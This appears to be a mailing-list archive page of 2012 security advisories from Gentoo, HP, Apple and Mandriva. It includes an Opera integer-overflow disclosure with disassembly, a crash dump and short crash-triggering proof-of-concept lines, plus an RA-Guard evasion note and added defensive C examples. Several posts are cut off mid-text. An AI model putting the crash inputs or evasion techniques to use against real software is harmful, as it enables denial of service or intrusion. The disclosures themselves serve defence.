GLSA (Gentoo Linux Security Advisory) publication changes

2012-02-02 Thread Alex Legler
Like other Linux distribution vendors, Gentoo is currently CC'ing advisories 
to the full-disclosure and bugtraq mailing lists.
Starting today, we will be *no longer* publishing our advisories to full-
disclosure or bugtraq.
We are following our colleagues at Ubuntu with this decision.

Users who want to receive advisories via email in the future should subscribe 
to the gentoo-announce mailing list, as described here:
  http://www.gentoo.org/main/en/lists.xml

We also offer an RDF feed at
  http://www.gentoo.org/rdf/en/glsa-index.rdf

Finally, our security notices are posted to our forums at
  https://forums.gentoo.org/viewforum-f-16.html

All past and new advisories can be viewed at
  http://glsa.gentoo.org/

Please contact secur...@gentoo.org with any questions.

-- 
Alex Legler 
Gentoo Security/Ruby/Infrastructure




[security bulletin] HPSBMU02739 SSRT100280 rev.1 - HP Data Protector Media Operations, Remote Execution of Arbitrary Code

2012-02-02 Thread security-alert

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03179046
Version: 1

HPSBMU02739 SSRT100280 rev.1 - HP Data Protector Media Operations, Remote 
Execution of Arbitrary Code

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2012-02-01
Last Updated: 2012-02-01

 --

Potential Security Impact: Remote execution of arbitrary code

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Data Protector 
Media Operations. This vulnerability could be remotely exploited to allow 
execution of arbitrary code.

References: CVE-2011-4791 (ZDI-CAN-956, ZDI-11-112)

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Data Protector Media Operations version 6.11 and earlier, running on Windows 
platform (2003, XP, 2008)

BACKGROUND

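CVSS 2.0 Base Metrics
===========================================================
  Reference       Base Vector                    Base Score
  CVE-2011-4791   (AV:N/AC:L/Au:N/C:C/I:C/A:C)   10
===========================================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002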

The Hewlett-Packard Company thanks Roi Mallo along with TippingPoint's Zero Day 
Initiative for reporting this vulnerability to security-al...@hp.com.

RESOLUTION

HP has provided the following patch to resolve this vulnerability.
The patch can be retrieved from 
http://support.openview.hp.com/selfsolve/document/KM1323025

For HP Data Protector Media Operations v6.20
Operating System Platform / Patch ID / Executable

Windows (2003, XP, 2008) / SMO A.06.20.01 / SMOWIN_00010.EXE

HISTORY
Version: 1 (rev.1) - 01 February 2012 Initial release

Third Party Security Patches: Third party security patches that are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security 
Bulletin, contact normal HP Services support channel.  For other issues about 
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin 
alerts via Email: 
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin List: A list of HP Security Bulletins, updated periodically, 
is contained in HP Security Notice HPSN-2011-001: 
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430

Security Bulletin Archive: A list of recently released Security Bulletins is 
available here: 
http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in the 
title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2012 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors 
or omissions contained herein. The information provided is provided "as is" 
without warranty of any kind. To the extent permitted by law, neither HP nor its 
affiliates, subcontractors or suppliers will be liable for incidental, special 
or consequential damages including downtime cost; lost profits; damages relating 
to the procurement of substitute products or services; or damages for loss of 
data, or software restoration. The information in this document is subject to 
change without notice. Hewlett-Packard Company and the names of Hewlett-Packard 
products referenced herein are trademarks of Hewlett-Packard Company in the 
United States and other countries. Other product and company names mentioned 
herein may be trademarks of their respective owners.


[CAL-2012-0004] opera array integer overflow

2012-02-02 Thread Code Audit Labs

CAL-2012-0004 opera array integer overflow


1 Affected Products
=
11.60 and prior


2 Vulnerability Details
=

Code Audit Labs http://www.vulnhunt.com has discovered an integer 
overflow vulnerability in array functions like Int32Array, Int16Array, ...

The Opera vendor says: "We have reproduced the problem, and determined that it 
does not have any security implications, since the crash is caused by 
a memory fill operation which the webpage has no control over, and this 
operation will always crash. It is therefore classified as a stability 
issue, not a security issue."



We still insist that whether it is a security issue or not should depend on 
the root cause of the bug, not on whether it is exploitable. Even though you 
think it is unexploitable, someone can exploit it through deeper research.


So if most people in the security community think this is a security issue,
please assign a CVE number.


3 Analysis
=
Int16Array(2147483647) example
Memory corruption happens if the following conditions are satisfied:
1: x*2 >2
2: x*2!=00
3: (x*2-1)+0x1f overflows 32 bits.

So the length of the malloc is (x*2-1)+0x1f, and
memset(eax+0x10,0,x*2) causes memory corruption.


.text:5C769F57
.text:5C769F57 loc_5C769F57:                   ; CODE XREF: sub_5C769DCE+17Cj
.text:5C769F57 mov     eax, [esp+48h+var_20]   ; var_20 is 2
.text:5C769F5B imul    eax, [esp+48h+var_3C]   ; var_3C is 8001
.text:5C769F60 cmp     eax, [esp+48h+var_3C]
.text:5C769F64 jb      short loc_5C769F37
.text:5C769F66 mov     [esp+48h+size], eax
.text:5C769F6A mov     eax, [ebp+arg_0]
.text:5C769F6D call    sub_5C14A6E8
.text:5C769F72 push    [esp+48h+size]          ; size
.text:5C769F76 push    dword ptr [eax]         ; int
.text:5C769F78 push    [ebp+arg_0]             ; int
.text:5C769F7B call    sub_5C765B6D
.text:5C769F80 add     esp, 0Ch

...

.text:5C46A598
.text:5C46A598 arg_0   = dword ptr  4
.text:5C46A598 size    = dword ptr  8
.text:5C46A598
.text:5C46A598 mov     edx, [esp+arg_0]
.text:5C46A59C push    esi
.text:5C46A59D mov     esi, [esp+4+size]
.text:5C46A5A1 test    esi, esi
.text:5C46A5A3 jz      short loc_5C46A5AA
.text:5C46A5A5 lea     eax, [esi-1]
.text:5C46A5A8 jmp     short loc_5C46A5AC
.text:5C46A5AA ; ---
.text:5C46A5AA
.text:5C46A5AA loc_5C46A5AA:                   ; CODE XREF: sub_5C46A598+Bj
.text:5C46A5AA xor     eax, eax
.text:5C46A5AC
.text:5C46A5AC loc_5C46A5AC:                   ; CODE XREF: sub_5C46A598+10j
.text:5C46A5AC mov     ecx, [edx+8]
.text:5C46A5AF add     eax, 1Fh
.text:5C46A5B2 push    0
.text:5C46A5B4 and     eax, 0FFF8h
.text:5C46A5B7 push    eax
.text:5C46A5B8 push    edx
.text:5C46A5B9 call    sub_5C019DA0

.text:5C765BF7 loc_5C765BF7:                   ; CODE XREF: sub_5C765B6D+50j
.text:5C765BF7 push    [ebp+size]              ; size
.text:5C765BFA lea     eax, [ebx+10h]
.text:5C765BFD push    0                       ; c
.text:5C765BFF push    eax                     ; dst
.text:5C765C00 call    memset




4 Exploitable?

Who knows?


5 Crash info:
===
(d10.ff4): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=01fff21d ebx= ecx=0367ffb0 edx=0076 esi=019c5ff8 edi=03610e68
eip=675b347e esp=02314de0 ebp=02314e24 iopl=0 nv up ei pl nz na pe cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs= efl=00010207
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Opera\Opera.dll -

Opera!OpGetNextUninstallFile+0x1961c:
675b347e 660f7f4150  movdqa  xmmword ptr [ecx+50h],xmm0 ds:0023:0368=

0:000> .exr -1
ExceptionAddress: 675b347e (Opera!OpGetNextUninstallFile+0x0001961c)
   ExceptionCode: c005 (Access violation)
  ExceptionFlags: 
NumberParameters: 2
   Parameter[0]: 0001
   Parameter[1]: 0368
Attempt to write to address 0368
0:000> kp
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.

02314e24  Opera!OpGetNextUninstallFile+0x1961c



6 POC:

Open an HTML file with the following content:


// all of these crash
Int32Array(1073741823)
Float32Array(1073741823)
Float64Array(1073741823)
Int32Array(1073741823)
Uint32Array(1073741823)
Int16Array(2147483647)
ArrayBuffer(4294967295)





7 About Code Audit La
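
The size arithmetic from section 3 of the advisory above, as an added C example (not code from the advisory or from Opera): it reproduces the unchecked length computation next to a checked version. The function names, the reading of the cmp/jb pair as a product-below-count test, and the 8-byte alignment mask (the mask in the listing is cut short) are assumptions.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

#define PAD        0x1fu         /* the "add eax, 1Fh" in the listing */
#define ALIGN_MASK 0xfffffff8u   /* assumed: round down to 8 bytes */

/* count * elem_size in 32 bits; rejected only when the product is below
 * the count (assumed meaning of the cmp/jb pair in the listing). */
bool byte_len_as_listed(uint32_t count, uint32_t elem_size, uint32_t *out)
{
    uint32_t n = count * elem_size;          /* wraps modulo 2^32 */
    if (n < count)
        return false;
    *out = n;
    return true;
}

/* ((n ? n-1 : 0) + 0x1f) & mask, with the addition left unchecked. */
uint32_t alloc_len_as_listed(uint32_t n)
{
    uint32_t base = n ? n - 1 : 0;
    return (base + PAD) & ALIGN_MASK;        /* wraps for n near 2^32 */
}

/* True when the listed arithmetic sizes the buffer below the fill length. */
bool listed_path_undersizes(uint32_t count, uint32_t elem_size)
{
    uint32_t n;
    if (!byte_len_as_listed(count, elem_size, &n))
        return false;
    return alloc_len_as_listed(n) < n;
}

/* Hardened form: multiplication and addition are both checked, and the
 * caller gets a failure instead of a wrapped length. */
bool alloc_len_checked(uint32_t count, uint32_t elem_size, uint32_t *out)
{
    if (elem_size != 0 && count > UINT32_MAX / elem_size)
        return false;
    uint32_t n = count * elem_size;
    uint32_t base = n ? n - 1 : 0;
    if (base > UINT32_MAX - PAD)
        return false;
    *out = (base + PAD) & ALIGN_MASK;
    return true;
}

int main(void)
{
    /* First two rows use arguments from section 6; the third is constructed. */
    const struct { const char *name; uint32_t count, elem; } cases[] = {
        { "Int16Array", 2147483647u, 2 },
        { "Int32Array", 1073741823u, 4 },
        { "Int16Array", 1024u, 2 },
    };
    for (size_t i = 0; i < sizeof cases / sizeof cases[0]; i++) {
        uint32_t len = 0;
        bool ok = alloc_len_checked(cases[i].count, cases[i].elem, &len);
        printf("%s(%lu): listed path undersizes=%d, checked path %s\n",
               cases[i].name, (unsigned long)cases[i].count,
               listed_path_undersizes(cases[i].count, cases[i].elem),
               ok ? "allocates" : "rejects");
    }
    return 0;
}
```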

Fwd: RA-Guard: Advice on the implementation (feedback requested)

2012-02-02 Thread Fernando Gont
Folks,

We have talked about this one quite a few times (including
).
-- still, most implementations remain broken.

If you care to get this fixed, please provide feedback about this I-D on
the IETF *v6ops* mailing-list , and CC me if possible.

Thanks!

Best regards,
Fernando




 Original Message 
Subject: RA-Guard: Advice on the implementation  (feedback requested)
Date: Wed, 01 Feb 2012 21:44:29 -0300
From: Fernando Gont 
Organization: SI6 Networks
To: IPv6 Operations 

Folks,

We have just published a revision of our I-D "Implementation Advice for
IPv6 Router Advertisement Guard (RA-Guard)"
.

In essence, this is the problem statement, and what this I-D is about:

* RA-Guard is essential to have feature parity with IPv4.

* Most (all?) existing RA-Guard implementations can be trivially evaded:
if the attacker includes extension headers in his packets, the RA-Guard
devices fail to identify the Router Advertisement messages. -- For
instance, THC's "IPv6 attack suite" ()
contains tools that can evade RA-Guard as indicated.

* The I-D discusses this problem, and provides advice on how to
implement RA-Guard, such that the aforementioned vulnerabilities are
eliminated, we have an effective RA-Guard device, and hence
feature-parity with IPv4.

We'd like feedback on this I-D, including high-level comments on whether
you support the proposal in this I-D.

Thanks!

Best regards,
-- 
Fernando Gont
SI6 Networks
e-mail: fg...@si6networks.com
PGP Fingerprint:  31C6 D484 63B2 8FB1 E3C4 AE25 0D55 1D4E 7492
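
The evasion described in the message above works against a filter that looks only at the fixed header's Next Header field. An added C example of the check a filtering device needs instead, not taken from the I-D or from any vendor's code: it walks the extension-header chain to the ICMPv6 header. The function names, verdict values, the handling of non-first fragments and the sample packet are assumptions or constructed for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum { NH_HOPOPTS = 0, NH_ROUTING = 43, NH_FRAGMENT = 44, NH_AUTH = 51,
       NH_ICMPV6 = 58, NH_DSTOPTS = 60, ICMPV6_RA = 134 };
enum ra_verdict { NOT_RA, IS_RA, UNDETERMINED };

/* Follow the whole header chain to the upper-layer header instead of
 * trusting the fixed header's Next Header field. UNDETERMINED means the
 * frame does not hold enough of the chain to decide; a guard would drop it. */
enum ra_verdict classify_ipv6(const uint8_t *pkt, size_t len)
{
    if (len < 40 || (pkt[0] >> 4) != 6)
        return NOT_RA;                        /* not an IPv6 packet */
    uint8_t nh = pkt[6];
    size_t off = 40;
    for (int i = 0; i < 16; i++) {            /* bound the walk */
        size_t hlen;
        if (nh == NH_ICMPV6) {
            if (off >= len)
                return UNDETERMINED;          /* type byte not in this frame */
            return pkt[off] == ICMPV6_RA ? IS_RA : NOT_RA;
        }
        if (nh != NH_HOPOPTS && nh != NH_ROUTING && nh != NH_DSTOPTS &&
            nh != NH_FRAGMENT && nh != NH_AUTH)
            return NOT_RA;                    /* some other upper layer */
        if (off + 8 > len)
            return UNDETERMINED;
        if (nh == NH_FRAGMENT) {
            /* Assumed policy: only first fragments (offset 0) are judged. */
            if ((((unsigned)pkt[off + 2] << 8 | pkt[off + 3]) >> 3) != 0)
                return NOT_RA;
            hlen = 8;
        } else if (nh == NH_AUTH) {
            hlen = ((size_t)pkt[off + 1] + 2) * 4;
        } else {
            hlen = ((size_t)pkt[off + 1] + 1) * 8;
        }
        if (off + hlen > len)
            return UNDETERMINED;              /* chain runs past the frame */
        nh = pkt[off];
        off += hlen;
    }
    return UNDETERMINED;
}

/* Constructed sample (buf holds 64 bytes): fixed header, optional 8-byte
 * Destination Options header with padding only, then an ICMPv6 header. */
size_t build_sample(uint8_t *buf, int with_dstopts, uint8_t icmp_type)
{
    size_t off = 40;
    memset(buf, 0, 64);
    buf[0] = 0x60;                            /* version 6 */
    buf[6] = with_dstopts ? NH_DSTOPTS : NH_ICMPV6;
    if (with_dstopts) {
        buf[off] = NH_ICMPV6;                 /* next header; length byte 0 = 8 bytes */
        buf[off + 2] = 1;                     /* PadN option */
        buf[off + 3] = 4;                     /* 4 padding bytes follow */
        off += 8;
    }
    buf[off] = icmp_type;
    return off + 8;
}

int main(void)
{
    uint8_t buf[64];
    size_t n = build_sample(buf, 1, ICMPV6_RA);
    printf("fixed-header Next Header=%d verdict=%d\n", buf[6], classify_ipv6(buf, n));
    return 0;
}
```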





Call For Paper

2012-02-02 Thread asemailing
CALL FOR PAPER



2012 ASE/IEEE International Conference on Privacy, Security, Risk, and Trust
Amsterdam, The Netherlands, September 3-6, 2012
WebSite: http://www.asesite.org/conferences/PASSAT/2012/
Workshop Proposal Submission Deadline: March 1, 2012
Paper Submission Deadline:  May 11, 2012


2012 ASE/IEEE International Conference on Cyber Security
Washington D.C., USA, October 5-7, 2012
Website: http://www.asesite.org/conferences/cybersecurity/2012/
Workshop Proposal Submission Deadline: April 30, 2012
Paper Submission Deadline: June 15, 2012

NOTICE: This e-mail correspondence is subject to Public Records Law and may be 
disclosed to third parties.



APPLE-SA-2012-02-01-1 OS X Lion v10.7.3 and Security Update 2012-001

2012-02-02 Thread Apple Product Security

APPLE-SA-2012-02-01-1 OS X Lion v10.7.3 and Security Update 2012-001

OS X Lion v10.7.3 and Security Update 2012-001 is now available and
addresses the following:

Address Book
Available for:  OS X Lion v10.7 to v10.7.2,
OS X Lion Server v10.7 to v10.7.2
Impact:  An attacker in a privileged network position may intercept
CardDAV data
Description:  Address Book supports Secure Sockets Layer (SSL) for
accessing CardDAV. A downgrade issue caused Address Book to attempt
an unencrypted connection if an encrypted connection failed. An
attacker in a privileged network position could abuse this behavior
to intercept CardDAV data. This issue is addressed by not downgrading
to an unencrypted connection without user approval.
CVE-ID
CVE-2011-3444 : Bernard Desruisseaux of Oracle Corporation

Apache
Available for:  Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact:  Multiple vulnerabilities in Apache
Description:  Apache is updated to version 2.2.21 to address several
vulnerabilities, the most serious of which may lead to a denial of
service. Further information is available via the Apache web site at
http://httpd.apache.org/
CVE-ID
CVE-2011-3348

Apache
Available for:  Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact:  An attacker may be able to decrypt data protected by SSL
Description:  There are known attacks on the confidentiality of SSL
3.0 and TLS 1.0 when a cipher suite uses a block cipher in CBC mode.
Apache disabled the 'empty fragment' countermeasure which prevented
these attacks. This issue is addressed by providing a configuration
parameter to control the countermeasure and enabling it by default.
CVE-ID
CVE-2011-3389

CFNetwork
Available for:  OS X Lion v10.7 to v10.7.2,
OS X Lion Server v10.7 to v10.7.2
Impact:  Visiting a maliciously crafted website may lead to the
disclosure of sensitive information
Description:  An issue existed in CFNetwork's handling of malformed
URLs. When accessing a maliciously crafted URL, CFNetwork could send
the request to an incorrect origin server. This issue does not affect
systems prior to OS X Lion.
CVE-ID
CVE-2011-3246 : Erling Ellingsen of Facebook

CFNetwork
Available for:  OS X Lion v10.7 to v10.7.2,
OS X Lion Server v10.7 to v10.7.2
Impact:  Visiting a maliciously crafted website may lead to the
disclosure of sensitive information
Description:  An issue existed in CFNetwork's handling of malformed
URLs. When accessing a maliciously crafted URL, CFNetwork could send
unexpected request headers. This issue does not affect systems prior
to OS X Lion.
CVE-ID
CVE-2011-3447 : Erling Ellingsen of Facebook

ColorSync
Available for:  Mac OS X v10.6.8, Mac OS X Server v10.6.8
Impact:  Viewing a maliciously crafted image with an embedded
ColorSync profile may lead to an unexpected application termination
or arbitrary code execution
Description:  An integer overflow existed in the handling of images
with an embedded ColorSync profile, which may lead to a heap buffer
overflow. This issue does not affect OS X Lion systems.
CVE-ID
CVE-2011-0200 : binaryproof working with TippingPoint's Zero Day
Initiative

CoreAudio
Available for:  Mac OS X v10.6.8, Mac OS X Server v10.6.8
Impact:  Playing maliciously crafted audio content may lead to an
unexpected application termination or arbitrary code execution
Description:  A buffer overflow existed in the handling of AAC
encoded audio streams. This issue does not affect OS X Lion systems.
CVE-ID
CVE-2011-3252 : Luigi Auriemma working with TippingPoint's Zero Day
Initiative

CoreMedia
Available for:  Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact:  Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description:  A heap buffer overflow existed in CoreMedia's handling
of H.264 encoded movie files.
CVE-ID
CVE-2011-3448 : Scott Stender of iSEC Partners

CoreText
Available for:  Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact:  Viewing or downloading a document containing a maliciously
crafted embedded font may lead to an unexpected application
termination or arbitrary code execution
Description:  A use after free issue existed in the handling of font
files.
CVE-ID
CVE-2011-3449 : Will Dormann of the CERT/CC

CoreUI
Available for:  OS X Lion v10.7 to v10.7.2,
OS X Lion Server v10.7 to v10.7.2
Impact:  Visiting a malicious website may lead to an unexpected
application termination or arbitrary code execution
Description:  An unbounded stack allocation issue existed in the
handling of long URLs. This issue does not affect systems prior to OS
X Lion.
CVE-ID
CVE-2011-3450 : Ben Syverson

curl
Available for:  Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Se

[ MDVSA-2012:012 ] apache

2012-02-02 Thread security

 ___

 Mandriva Linux Security Advisory MDVSA-2012:012
 http://www.mandriva.com/security/
 ___

 Package : apache
 Date: February 2, 2012
 Affected: 2010.1, 2011., Enterprise Server 5.0
 ___

 Problem Description:

 Multiple vulnerabilities have been found and corrected in apache
 (ASF HTTPD):
 
 The log_cookie function in mod_log_config.c in the mod_log_config
 module in the Apache HTTP Server 2.2.17 through 2.2.21, when a threaded
 MPM is used, does not properly handle a \%{}C format string, which
 allows remote attackers to cause a denial of service (daemon crash)
 via a cookie that lacks both a name and a value (CVE-2012-0021).
 
 scoreboard.c in the Apache HTTP Server 2.2.21 and earlier might
 allow local users to cause a denial of service (daemon crash during
 shutdown) or possibly have unspecified other impact by modifying
 a certain type field within a scoreboard shared memory segment,
 leading to an invalid call to the free function (CVE-2012-0031).
 
 protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not
 properly restrict header information during construction of Bad
 Request (aka 400) error documents, which allows remote attackers to
 obtain the values of HTTPOnly cookies via vectors involving a (1)
 long or (2) malformed header in conjunction with crafted web script
 (CVE-2012-0053).
 
 The updated packages have been upgraded to the latest 2.2.22 version
 which is not vulnerable to this issue.
 
 Additionally APR and APR-UTIL have been upgraded to the latest versions
 1.4.5 and 1.4.1 respectively which hold many improvements over the
 previous versions.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0021
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0031
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0053
 http://httpd.apache.org/security/vulnerabilities_22.html
 http://www.apache.org/dist/httpd/CHANGES_2.2.22
 http://www.apache.org/dist/apr/CHANGES-APR-1.4
 http://www.apache.org/dist/apr/CHANGES-APR-UTIL-1.4
 ___

 Updated Packages:

 Mandriva Linux 2010.1: